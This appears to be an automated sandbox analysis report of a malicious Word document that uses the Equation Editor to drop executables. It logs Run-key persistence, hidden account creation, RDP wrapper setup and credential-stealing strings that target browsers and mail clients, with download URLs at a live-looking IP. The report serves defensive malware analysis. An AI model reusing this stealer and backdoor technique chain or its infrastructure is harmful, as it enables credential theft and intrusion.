          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040D3CA OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,7_2_0040D3CA
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6650.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004021AA CoCreateInstance,5_2_004021AA
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404AB5
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040E80F CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,GetModuleFileNameExW,CloseHandle,Process32NextW,CloseHandle,7_2_0040E80F
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCommand line argument: pg@6_2_004066C0
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCommand line argument: pg@8_2_004066C0
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCommand line argument: pg@11_2_004066C0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: Binary string: wntdll.pdb source: efwhixxln.exe, 00000006.00000003.921394977.0000000019DA0000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000006.00000003.922547352.0000000019F00000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\xampp\htdocs\6398b440b292443b9ad8030aed6a4b16\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.928480025.0000000002781000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmp, efwhixxln.exe, 00000006.00000000.914261260.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000006.00000002.924086637.00000000002E0000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000000.916811680.0000000000409000.00000002.00000001.01000000.00000006.sdmp, efwhixxln.exe, 00000007.00000002.1181864719.0000000003130000.00000004.00000020.00020000.00000000.sdmp, dpgglstunxhpw.exe, 00000008.00000000.938412889.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmp, dpgglstunxhpw.exe, 0000000B.00000000.966540801.0000000000409000.00000002.00000001.01000000.00000008.sdmp, nsv4184.tmp.5.dr, dpgglstunxhpw.exe.6.dr, efwhixxln.exe.5.dr

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeUnpacked PE file: 7.2.efwhixxln.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeUnpacked PE file: 7.2.efwhixxln.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E018 pushfd ; retf 0029h2_2_0029E019
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A62A2 push edx; ret 2_2_002A62A3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00297CB0 push eax; retn 002Ch2_2_00297CB1
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A2C8C push ebp; retf 2_2_002A2CC3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E4C0 pushfd ; retf 0029h2_2_0029E4C1
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C32A pushad ; ret 2_2_0029C38D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C310 pushad ; ret 2_2_0029C311
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C75C push ecx; ret 2_2_0029C77C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E1D8 pushfd ; retf 0029h2_2_0029E1D9
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00402F05 push ecx; ret 6_2_00402F18
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00401130 push eax; ret 7_2_00401144
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00401130 push eax; ret 7_2_0040116C
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00412341 push ebp; retf 7_2_00412344
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 8_2_00402F05 push ecx; ret 8_2_00402F18
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_00402F05 push ecx; ret 11_2_00402F18
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_004067CC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_004067CC
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040B55D NetUserAdd,NetLocalGroupAddMembers,7_2_0040B55D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\gstallabt4.2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeFile created: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\word.exeFile created: C:\Users\user\AppData\Local\Temp\efwhixxln.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040264B URLDownloadToFileW,ShellExecuteW,7_2_0040264B
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_004091E6 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,7_2_004091E6
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00409722 lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,7_2_00409722
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run xqvcdegpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run xqvcdegpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040B64D OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0040B64D

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: efwhixxln.exe, 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exe, 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exe, 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exe, 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exe, 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: efwhixxln.exe, 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: efwhixxln.exe, 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
